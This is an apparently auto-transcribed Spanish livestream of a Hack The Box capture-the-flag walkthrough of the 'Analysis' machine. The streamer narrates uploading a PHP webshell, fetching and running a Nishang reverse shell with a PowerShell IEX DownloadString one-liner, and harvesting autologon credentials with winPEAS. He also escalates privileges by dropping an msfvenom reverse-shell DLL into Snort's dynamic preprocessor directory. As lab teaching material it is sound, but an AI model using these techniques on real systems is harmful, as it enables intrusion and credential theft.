tú tendrías que ir mirando cada nota por si hay alguna movida aquí rara i am getting mysql error que mysql estaba activo el puerto que era 3306 me parece de forma que podríamos tratar de bueno un authorized pero podríamos intentar utilizar el usuario y la contraseña que tenemos pero ya os adelanto de que no vamos a lograr hacer gran cosa el bueno computer crashes se ve que el problema está dando o sea el equipo está dando problemas pero no veo nada interesante incredible latency on file shares latencia increíble o elevada a la hora de compartir archivos pero no veo ninguna contraseña ni nada raro SOC report envía un archivo para el SOC de cara a análisis cuidado eh vamos a darle a examinar y vamos a subir por ejemplo de los fondos mi imagen esta que tengo de fondo de pantalla open upload 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 barra fondo.jpg cuidado que tenemos una information leakage podemos ver el nombre del directorio donde se almacenan los recursos lo siento el archivo es muy largo no ha sido subido bueno esto de upload quiero pensar que se sube aquí upload efectivamente acceso denegado pero si conoces el recurso puedes apuntar a este ¿no? aquí como veo que el lenguaje de programación interpreta php pues voy a intentar subir una webshell algo rapidito vamos a dirigirnos al directorio descargas y aquí me voy a crear un archivito cmd.php ¿no? entonces bueno con etiquetas preformateadas para mantener el formato bonito como si estuviéramos por consola voy a emplear shellexec para a través de lo que yo reciba mediante el control de un parámetro cmd voy a concatenarle el cierre de esta etiqueta pues que yo pueda controlar que comando quiero ejecutar a nivel de sistema empleando la función shellexec si esta no funciona empleamos system si no pass through si no exec o si no podemos crearla nuestra propia y hay técnicas que te permiten burlar estas restricciones que lo ideal sería primeramente subir un php info para ver las disabled functions y ver si están deshabilitadas algunas críticas como system shellexec y todo esto vamos a intentar subir esto primero que nada examinar desktop sabitar hack the box analysis content bueno no están descargas cmd.php vamos a intentar subir esto cmd.php upload file is safe vamos a ver eso upload cmd.php y me interpreta el php bueno pues esto ya es cagada esto ya tiene pinta de que tenemos una vía potencial de obtener ejecución remota de comandos yo aquí filtraría por disabled barra baja o fun no disable barra baja functions y pone no value así que debería de poder ejecutar la que yo quiera en un principio yo aquí esto igual lo cambiaría y eso jugaría con etiquetas preformateadas para yo poder controlar el comando que quiero ejecutar mediante el empleo del parámetro cmd de forma que se lo pasa la función shellexec se ejecuta y chimpón entonces vamos a intentar subir esto esto fuera esto fuera examinar cmd php upload recargamos aquí y vale no estamos empleando el parámetro cmd por eso te sale este error pero si ponemos interrogante cmd igual a who am I pues svc web tenemos ahí ejecución de comandos ip config vamos a ver donde estamos y estamos en la 10 129 230 179 que es la ip de la máquina víctima de forma que nada ahora lo que queda es ganar acceso al sistema hay otra forma potencial de entrar a la máquina pero con esto yo creo que ya es suficiente entonces nada que haría ahora yo para ganar acceso al sistema pues por ejemplo jugaría con nishank con el invoke powershell tcp.ps1 que ya sabéis que es el que siempre empleamos para entablarnos la reverse shell o si queréis algo que podéis hacer es jugar con con pty shell de antonio coco que lo que te permite es poder hacer control c y operar en una consola un poco más interactiva entonces nada me voy a clonar todo esto jit clone voy a clonarme esto de aquí me meto en el directorio nishank directorio shells y bueno voy a renombrar el que siempre utilizamos que es este para llamarlo ps.ps1 más cómodo para poder hacer la alusión a este desde la máquina windows pero más cómodamente y no tengo que poner todo el nombre entero vale pues nada recordad una opción es nos descargamos este script importamos el script e invocamos invoke powershell tcp con los parámetros correspondientes para entablarnos la reverse shell o para matar varios pájaros de un tiro tú si esta instrucción que te entabla la reverse shell la pones al final lo que permite es que si la llamas con ex que haremos el ex new object netweb client download string le pasamos la url de nuestro recurso que nos vamos a compartir a través de un servicio http pues cuando llega al final esta instrucción la va a entender porque ya ha cargado toda la función principal y va a saber que lo que quieres es entablarte una reverse shell entonces la reverse shell va a ser a mi ip que es la 10 10 14 46 por el puerto 4 4 3 que es donde voy a estar en escucha entonces nada para tener una consola medianamente interactiva con la que poder limpiar pantalla pero no hacer control c cuidado si queréis eso pues tiráis con la de compity wire shell vale pues rl grow up c a r netcat nlup 443 con estos parámetros de rl grow up vas a poder hacer control l poder operar cómodamente tener histórico de comandos para con control r o subiendo con las flechas pues poder maniobrar por comandos anteriores pues nada yo me voy a montar un servidor http con python ofreciendo todos estos recursos entre los cuales está este y desde aquí simplemente tendríamos que llamarlo podríamos decirle powershell ex newobject netwebclient .downloadstring que lo he escrito mal string y aquí le pasamos nuestra ip que es la 10.10.14.16 perdón 46 y el recurso ps.ps1 esto es un one liner típico de powershell que lo que te permite es cargar un recurso externo que está alojado en un servicio web que es el mío que es el script en powershell el cual al cargar me permite arriba obtener la solicitud por get de que la ha pillado pero no me han tablado la reversehell eso está curioso a ver vamos a ver que ha pasado ahí que a lo mejor hemos cometido algún error de sintaxis o algo invoke powershell tcp reverse ip address la 10.10.14.46 y el puerto 4.4.3 un espacio como que un espacio a ver que ha pasado ahí powershell ex newobject net punto web client download string http 10.10.14.46 psps1 enter cuidado eh curioso que no me la estén hablando a lo mejor he retocado algo sin querer del script y algo ha pasado pero 4.4.3 no es https si no hay problema de hecho es conveniente porque así le haces pensar a la máquina en caso de que haya alguna solución que es tráfico https cuando en verdad no y es una webshell o sea una reverse shell que te estás enviando object deja un espacio ix no no esto está bien eh esto está bien si porque de hecho la solicitud me la está haciendo sin ningún problema tiene pinta de ser a lo mejor lo que nos hemos descargado de aquí que no le ha gustado por alguna razón ah que ha pasado aquí que es esto cf5 como ahora estaba corrupto el script a ver ahora enter ahí está uamai svc web ya puedes cerrarlo de arriba control l y nada ya estás dentro de la máquina ipconfig y fijaros que estamos en las 230 179 o sea que a partir de aquí ya es ver de qué forma continuar operando vale pues estamos en inetpub internal dashboard upload ciego mkdir test tengo capacidad de escritura en este directorio eso está interesante y nada si nos vamos a la raíz mmm bueno tenemos varios recursos snort cuidado con eso si ponemos qué es snort que a ver es un directorio pero seguramente es porque está instalado snort es un sistema de detección de intrusos en red libre y gratuito ofrece la capacidad de almacenamiento de bitácoras en archivos de texto y envases de datos abiertas como mysql cuidadito con el snort tiene un SOC viéndolo todo sí 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 el SOC aquí está ahora mismo con un montón de alertas en la jeta y está yendo por nosotros tenemos que darnos prisa que si no nos encarcelan de hecho snort log.txt ojo eh device npf bueno esto no sé qué pero algo ahí raro hay vamos a irnos al directorio users y bueno vamos a meternos en jdu no podemos bueno está en francés todo eh SOC analyst dir no podemos meternos web service dir error y wsmith dir error también no podemos hacer nada vale tenemos un directorio public podemos ver si hay algo dentro de documents no hay nada en downloads no hay nada en lo demás no creo que haya nada así que vale curioso en una de las máquinas anteriores que hicimos de directorio activo jugábamos con ad piece para enumerar esta máquina al estar involucrando temáticas de directorio activo y todo esto pero también se puede jugar con win piece porque a fin de cuentas ciertas eh cositas de enumeración en windows pues también te pueden reportar cosas interesantes el win piece aislado al ad piece que yo correría ambos para detectar vías potenciales también de elevar nuestro privilegio pero también podéis jugar con el win piece yo por ejemplo aquí en este recurso me suelo ir a release y por ejemplo win piece x64 intuyo que será system info será de 64 bits efectivamente pues yo me puedo descargar esto de win piece x64 .exe vamos a esto descargarlo y transferirlo a la máquina víctima podro dirigirme aquí me traslado el win piece al directorio actual de trabajo me comparto un servicio http y con cert útil pues me transfiero ese recurso 1446 y win piece x64.exe ahí me lo estoy descargando y si todo ha ido bien bueno aquí no tenemos capacidad de escritura vamos a irnos a windows temp mkdir test aquí deberíamos de tener ahí está y ahí nos descargamos esto de aquí dir y ahí lo tenemos win piece estamos en powershell esto hay que tener dos cosas en cuenta si yo ahora esto me lo ejecuto el output de win piece es muy grande y si no tienes bien configurado el buffer de en este caso no sé si sería de la kitty como tal o de qué creo que sí claro tienes que tener en cuenta que a lo mejor si vas subiendo para ver todo lo que te ha reportado hay un tope y no vas a poder ver todo entonces yo lo que os recomendaría es que esto por ejemplo ya que tenemos capacidad de escritura en la ruta de subida de archivos donde está la webshell creo que era aquí podríamos el output luego trasladarlo a esa ruta nos lo descargamos y lo vemos luego en nuestro equipo ¿no? entonces bueno el output de esto lo voy a almacenar en output.txt de forma que enter y vamos a ver en un rato pues qué es lo que nos reporta el propio win piece recordad win piece es una herramienta que te permite aplicar reconocimiento en máquinas windows para bueno en caso de que hayan contraseñas almacenadas en registros como el autologo entre otras cosas pues te las muestra y si hay algún tipo de información o vector crítico de digamos que te pueda permitir elevar tu privilegio o hacer algo crítico te lo va a reportar lo mismo con el ADPIS que el ADPIS es específico de directorio activo para determinarte vías potenciales en cuanto a conceptos de directorio activo para elevar privilegios de hecho el otro día habíamos vulnerado ADCS que era el servicio este de certificados de directorio activo y hacíamos una movida chula para abusar de un nivel que nos permitía crear un certificado para el usuario administrador para usarlo conectarnos obtener un hash NT y bueno estaba interesante eso Limpis para Windows el autor es español creo hostia pues eso no lo sé el autor es Sam Ratashock pues no lo sé no sé si es español ni idea de eso vale esto lo he dicho tarda un poquito el Winpeace te arroja mucho output así que viene bien almacenarlo y ahora a ver cómo traérnoslo a nuestro directorio que bueno también si no lo que podemos hacer lo que pasa es que está el snort ahí dando por culo o sea que tenemos que buscar vías potenciales de exfiltrar información tú por ejemplo con smb server te puedes compartir un recurso a nivel de red identificable con el nombre de smb folder que esté sincronizado con el directorio actual de trabajo le voy a dar soporte a la versión 2 de smb por ser windows 10 que a veces da conflicto entonces enter yo por ejemplo este output que bueno veo que tiene contenido en el campo length pues podría intentar decirle oye este output me lo voy a traer a mi equipo a la 10.10.14.46 al recurso compartido a nivel de red smb folder y lo voy a depositar como output.txt ya sabéis que esto al ser una conexión a nivel de red por debajo voy a interceptar un hash net.ntlm de versión 2 el cual puedo tratar de craquear que no me sirve para ser paz de hash pero que lo puedo intentar romper por fuerza bruta empleando un diccionario si lo intento copiar ahí veo múltiples conexiones a nivel de red pero fijaros que aquí busne pubes pasa a acceder de dossier partag jodidísima nos impiden el poder bueno esto de hecho creo que no es el snort como tal sino políticas propias de en este caso la máquina por tanto bueno para qué complicarnos dice que mbap ya se fue ah vale ya se fue a madrid entonces que la última vez al final no se había ido bueno yo lo que haría en este caso sería por ejemplo que ruta era estábamos en inet pub internal dashboard publoats no aquí no era mkdir test ah no si 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 era aquí pues me voy a intentar copiar esto de windows temp test output.txt aquí como output.txt y ya está y ya lo tienes ahí entonces aquí si tú ahora pones uploads output.txt ah directorio test perdón test que hemos creado vale ahí está voy a descargarme esto preferiblemente porque aquí los colores no se interpretan pero en la consola sí entonces aquí si tal haría un wget bueno aquí wget de esto y me abriría el output y ahí está ahí ya lo vemos todo más chulo entonces nada este es el reconocimiento que la herramienta winpeace pues ha hecho entonces nada ya sabéis que en rojo se indican vías potenciales para elevar nuestro privilegio en verde pues esto ahí te lo explica todo entonces nada esto es ir viendo a ver qué hay windows bulms search powered by watson bueno hay algunas vulnerabilidades por aquí que nos están comentando con binic luaf v post luaf v post red great race condition bueno condición de carrera habría que ver esto exactamente qué es si es que nos permite elevar nuestro privilegio o qué hay varias cositas varios cv's pero vamos a ir viendo a nivel informativo si ha extraído credenciales o algo interesante entonces nada aquí vemos información powershell settings esto da igual drives information nada interesante status un gnome nada printable explicit nada users usuarios usuarios logueados vale tenemos al user administrator guest jdu estos son los usuarios del sistema y cuidado credenciales del autologon encontradas a nivel de registro jdu jdu os acordáis que jdu estaba en el grupo remote management users ¿no? aquí podríamos hacer un net user jdu y está en utilizators de gesti cuidado eh lo que podríamos tratar de validar es si estas credenciales son válidas que al parecer están ahí expuestas a nivel de registro que hay una query que desde powershell te permite obtener eso directamente autologon powershell obtain get gp autologon es una línea o dos que haces y tienes que meterte en una unidad lógica creo que era o algo así y luego tienes una bueno aquí lo han complicado todo mucho get childen sysbolt pass a ver que es una línea solo que estás montando aquí compañero a ver eh get get credentials autologon registry powershell vamos a ver check user credentials and set autologon vamos a tirar de hacktricks mejor que me imagino que aquí estará esto contemplado espero que por algo es la biblia del hacking autologon eh windows local privilege escalation vale vamos a ver si filtramos aquí por autologon no pero esta no es esta no es como tal no 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 me lo está poniendo bueno hay un hay una serie de comandos que puedes llegar a files and registry credentials es algo como esto pero específico para el autologon habría que buscar la ruta porque ahora mismo no sé si a lo mejor aquí lo pone catchet gpp password no esto no openvpncredentials no inside registry no esto no lo está contemplando bueno es una tontería o sea son solamente dos líneas o una que hay que ejecutar y te vuelca esto pero bueno tenemos un usuario y una contraseña jdu si hacemos por aquí esto vamos a dirigirnos al directorio crackmapexec poetry run todo esto el usuario jdu creo que era el que tenía que vimos con el lab domain search pues que tenía formaba parte y ahí lo vemos arriba del grupo remote management users esto hace que crackmapexec te reporte poned y en consecuencia puedas emplear por ejemplo evilwinrm para abusar del puerto 25985 que es el del winrm para conectarte con estas credenciales y obtener una consola interactiva lo haces esto y ahí ya te conectas huamai yondú o se pronuncia shondú bueno como se pronuncie escritorio ahí vemos la primera parte de la máquina la flag así que ahí estaría voy a cerrar ya la de arriba si tal algo que habría hecho aquí creo que más cómodo habría sido esto el output pues filtrar por password creo que habría sido más cómodo como output como que no si no c windows temp test acceso denegado hostia bueno estaba en inetpub internal dashboard hubloat test vale también podríamos haber hecho esto output.txt find str y filtrar por la cadena password esta es otra y ahí encontramos cositas ¿no? vemos otra de hecho pero creo que esta estaba en mayúscula password vale y bueno default password solo que claro ¿de qué? pues no lo sabes la idea es recorrer todo el output que no sé por qué aquí no me lo está pillando que es porque está en negrita a lo mejor está en formato aquí sin sensitive que raro bueno pero la cosa es que ahí estamos huamai john do y vale mira ahí hay alguien que lo acaba de reportar eso sí puede ser eso a lo mejor cd hklm ahí está y a ver software microsoft windows no sé qué sí puede ser toda esa línea a ver todo esto ¿cómo? ¿qué has hecho ahí? ah te estás no pero esto es un desplazamiento ¿no? esto no puede ser así esto vamos a desplazar más primero aquí ahí está vale y ahora lo otro vale de hecho sí cd pusiste cd que no lo vi vale eso y ahora ejecutas este comando y ahí obtienes las credenciales usuario jdu y default password la contraseña ahí está muy bien positivo muy bien y winpeace pues te lo hace por ti pero esta es la forma manual de suele ser algo que en algunos ctfs se hace comprometes una máquina windows y a veces en los registros del winlogon del autologon pues puedes llegar a pillar credenciales eso vale pues nada cd volvemos a la unidad en la que estábamos y y bueno esto de snort está curioso podríamos tratar de ver qué hay eh tenemos un directorio bing vemos varias dll tenemos un directorio etc tenemos varias cositas un archivo de configuración de snort que bueno tiene un montón de reglas un montón de movidas bueno la máquina tiene creo que eran dos formas de escalar privilegios la de snort está chula porque bueno primero que nada viendo snort tú ya sabes que si estás snort por ahí lo primero que como atacante tienes que hacer es poner snort privilege escalation windows para ver si hay alguna vía potencial a través de la cual elevar privilegio entonces bueno te pone s id no sé qué pero esto es del propio snort windows local privilege escalation pero aquí no hablan de snort no vemos nada como tal accesible así de primera o sea que tiene pinta de que igual con snort poca cosa se puede hacer sin embargo si hay reglas snort pues bueno como no conocemos cómo es su configuración podríamos revisar por ejemplo de snort el manual eh snort manual y bueno el manual creo que es este yo por ejemplo lo que suelo hacer para utilidades o soluciones que no he tocado es ver cositas que tiene a nivel de configuración o de contenido de utilidades de lo que puedes hacer con snort o con lo que corresponda para ver si de alguna forma me puedo aprovechar de por ejemplo tener escritura o capacidad de escritura en alguno de estos directorios para cambiar su configuración de cara a ciertas reglas con las que detecta alguna anomalía y te reporta equis cosa o te ejecute determinada acción entonces aquí por ejemplo viendo así de primeras te pone snort overview esto a mi me la suda configuration snort o sea configuring snort si vosotros miráis esto de primeras que es lo que más os llama la atención de cara a otras cosas que hemos llegado a tocar de otras máquinas de tantas máquinas que hemos hecho de aquí hay algo que igual puede ser llamativo y que puedes decir en hostia vamos a ver que es lo que contempla este punto porque 2.6 output modules no puedes pedirle a chat gpt que te dé un ejemplo de configuración del snort no 2.11 active response no dynamic modules carga de módulos dinámicos cuidado con eso que de hecho si os vais a infosecmachines.io este concepto de dynamic dynamic modules como lo tenemos contemplado aquí a ver apply search dejad que esto lo pongo en amarillo hijacking dynamically linked shared object no local file read dynamically generated no pero me suena que esto lo hemos tocado pero con otro nombre a lo mejor es que como lo hemos contemplado ponemos tantos nombres raros a veces dynamic modules modules a secas module installing a new module docker breakout a lo mejor lo hemos contemplado con otro nombre no tengo ni idea pero la carga de de hecho hace poco no habíamos hecho una carga de módulo que fue una dll que habíamos construido con msfbenon para toda la movida no hay una máquina que hicimos hace poco que contemplaba eso por eso me está sonando bueno dll hijacking pero no es la idea la cosa es que por ejemplo tú aquí si esto lo miras te pone que puedes cargar módulos dinámicamente te pone telesnort to load the dynamic preprocessor shared library or all dynamic preprocessor shared libraries o sea tú puedes cargar librerías compartidas en formato en este caso .dll la opción por ejemplo aquí es esta dynamic preprocessor tú lo que puedes hacer analizando la documentación es en la propia en el propio archivo de configuración de snort que en este caso era snort.conf si tú por ejemplo filtras aquí en snort.conf por no grep no find str si filtras por esta política o como se llame fijaros que te pone dynamic preprocessor directory y te está poniendo un directorio donde seguramente hayan múltiples dll pues todas estas en parte las carga porque tú con esta directiva no política le indicas a snort que es lo que debe cargar dinámicamente en cuanto a archivos dll respecta entonces podría estar tenso que para esa este servicio que está activo quiero pensar que corriendo como administrador o como usuario privilegiado pues que de cara a ciertas acciones cada tanto pues pueda llegar a cargar dll existentes ahora o que tú crees maliciosas si tú por ejemplo aquí creas un directorio test fijaros que te lo permite o sea que puede estar interesante el tratar de ver ya que snort te carga dinámicamente bueno espérate estábamos en otro directorio donde coño estábamos que fue lo que hicimos esto donde era vale se supone que están aquí vamos a movernos a c snort lib snort dynamic preprocessor ahí está mkdir test vale también tenemos capacidad de escritura pues dado que snort carga dinámicamente librerías compartidas archivos dll en este caso que existan en este directorio pues algo que podríamos tratar de hacer ya que está activo corriendo el servicio quiero pensar que como el usuario administrador pues podríamos intentar crear nuestra propia dll maliciosa para ver si en algún momento de cara a determinada cosa que hagamos o si se hace cada tanto pues nos carga lo que nosotros hayamos subido en este caso no era la máquina de sqlite donde se cargó el módulo es que me suena que si tío fue una máquina de hace poco que habíamos llegado a hacer no me acuerdo cual fue tío pues nada lo que podríamos tratar de hacer es subir una dll maliciosa aquí que para hacerla pues por ejemplo con msfbenom puedo indicar la nivel de payload que estamos operando con windows 64 bits shell reverse tcp no voy a jugar con metasploit sino con netcat por eso no pongo meterpreter quiero que me entable una reverse shell a mi ip por el puerto 443 el formato va a ser una dll la arquitectura es 64 bits y el output lo voy a llamar pues por ejemplo reverse.dll entonces nada vamos a exportar esto y es una simple dll que hemos creado la cual vamos a subir a la máquina esta que bueno evilwinrm posee upload como funcionalidad entonces si quieres incluso ahorrarte esto ya desde aquí le puedes indicar la ruta y te lo hace rápido reverse.dll no como no such file or directory como check file names que es lo que no le ha gustado exactamente esto está aquí ¿no? ls reverse .dll vale pues nada vamos a montarnos un servidor http y lo hacemos así entonces certutil.exe menos f menos url caché split http la 10.10.14.46 reverse.dll vale pues en un principio subida está entonces lo dicho dado que está esta política esta directiva contemplada en el archivito de configuración eso quiere decir que snort va a cargar dinámicamente pues librerías compartidas que residan en el directorio que esté configurado en esta directiva especificada ¿no? que en este caso te pone ahí la ruta donde va creo que te lo pone también specify file followed by the full or relative path to the shared library o especifica un directorio seguido por la ruta absoluta o relativa donde estén pues todas las librerías estas compartidas entonces bueno yo me voy a poner en escucha por el puerto 443 de momento no voy a hacer nada quiero ver si snort se encarga de cargarla automáticamente cada tanto cada minuto cada dos minutos o algo así por el estilo y de lo contrario pues si no nos llega nada vemos a ver de qué forma podemos hacer eso con MSF Venom especificado bien la IP ¿no? sí pues nada vamos a esperar un poquito a ver si podemos obtener algo le di el comando ¿qué? le di 4 de RAM la PS38 está bien o le subo más ahí está esa es ahí está pues nada vamos a esperar un poquito a ver qué nos llega Saler colocó gracias por el Prime y AnthonyXYZ también por el Prime se agradece un montón el apoyo espero que vaya todo correcto pues nada esto es esperar un poquito dejad que reviso aquí cositas de potencia Tito ¿puedes hacer algún día un vídeo para YouTube con las extensiones de Firefox enfocadas al hacking que más usas? apenas uso tío la única que uso es la de Dark Reader que no es ni para hacking y bueno el Foxy Proxy eso sí y el Wapalizer poco más realmente así que eso MSF Venom Windows 64 Shell Reverse TCP la 10.14.46 Puerto 4.43 formato DLL arquitectura 64 Reverse DLL sí en un principio vamos a darle un tiempito a esto o sea no me lo ha borrado ¿no? creo que no te lo borraba dir no reverse.dll vale pues a ver está hackeando el área 51 pues sí el área 51 tal cual hay una extensión que se llama Hack Tool para el que preguntaba me suena haberla usado esa tío pero creo que dejé de usarla por alguna razón me suena haberla usado es una herramienta vieja esa ¿no? creo que no es nueva y tú sabes subirás esta resolución de máquina a YouTube tuve que salir y me perdí muchas cosas pues la sí sí la subiremos al canal secundario vale yo no sé si Snort como tal te detecta anomalías en tiempo de sí ¿no? o sea no sé si a lo mejor por ejemplo de la webshell puede llegar a pillar algo porque claro la función shellexec que estamos empleando no sé si habrá alguna regla Snort que la casque y es cuando entra en actuación cuando te carga la librería compartida que creas que en este caso es la de LL vamos a decirle por ejemplo ¿dónde era que teníamos esto? en cmd.php y le decimos interrogante cmd igual a dir no, no creo que nos lo esté cascando vamos a esperar un poquito es raro debería de o sea de pasar algo ya dir reverse.dll y la hemos creado bien en un principio no sé si a lo mejor cambiar probar a cambiar el puerto windows 64 shellreverse tcp está todo correcto en un principio a lo mejor cambiamos el puerto a un dos tres cuatro o alguna otra cosa sortada de entradas de navaja nega por ser seguidores habitar no, no, no cuidado con eso aquí spam de eventos no se hace baneado fuera de aquí aquí eventos sin mi permiso patrocinarlos o publicitarlos por la puta cara sin dinero de por medio ni de coña ni de puta coña fuera de aquí la carga de módulos lo hace en autosnort o tienes que darle manual debería de ser auto eh ojo eh mira el banear al chaval este fue lo que hizo que esto funcionara administrateur cuidado pues nada se ve que tarda un poco dos minutos más o menos y ya está y ya con esto pues vamos a irnos a we bueno estaba en users administrateur desktop y root.txt y listo ahí está la flag privilegiada la escalada es un poco rebuscada porque claro tienes que ponerte a revisar toda la documentación de snort todo esto que a ver la carga de módulos dinámicas y tal es que lo hicimos hace poco con una que tuvimos que jugar con mcs para crear de un archivo csharp de un código que habíamos creado os acordáis pues crear o un exe un ejecutable o una dll la cual cargábamos dinámicamente a través de un de una aplicación de algo si no recuerdo mal entonces cuando te hablan de carga de módulos dinámicos eso cuidado porque ya de cosas que hemos tocado pues puede resultar interesante el ver de que forman tiempo real pues llega a cargar módulos dll o cosas que tú le puedas aportar entonces bueno eso tendrías que llegar a este punto para luego una vez lo ves mirar las directivas existentes y filtrar del archivo de configuración de snort pues que directivas existen y esta en caso de que exista pues que ruta contempla que donde están las dll que puedes luego cargar y pues eso esperar a que se ejecute que intervalos regulares de tiempo aplica la carga de los módulos existentes y incluye el tuyo nuevo que le metes y bueno esa es la idea de la escalada por eso se debe llamar así la máquina analysis pues puede ser porque esta parte sí que requeriría de mucho análisis que te puedes volver puto loco porque para llegar tú a ese punto tiene telita pero bueno es un ctf al final te hacen pensar romperte la cabeza y yo lo que os muestro aquí es el camino para poderla hacer y que ya luego por vuestra cuenta os rompáis la cabeza cuando toque y nada poco más vamos a validar la máquina en el excel máquina concluida muy chula la tendréis en el canal secundario en breve intentaré subirla yo creo que es preferible mañana a no ser que la suba hoy pero si la subo hoy es un poquito tarde pero para los de latam igual os va bien en el curso enseñas cómo instalar parrot y eso sí hombre coño eso lo mostramos en la primera clase del curso de introducción a linux y el de personalización de linux en esos dos ahí le os enseño eso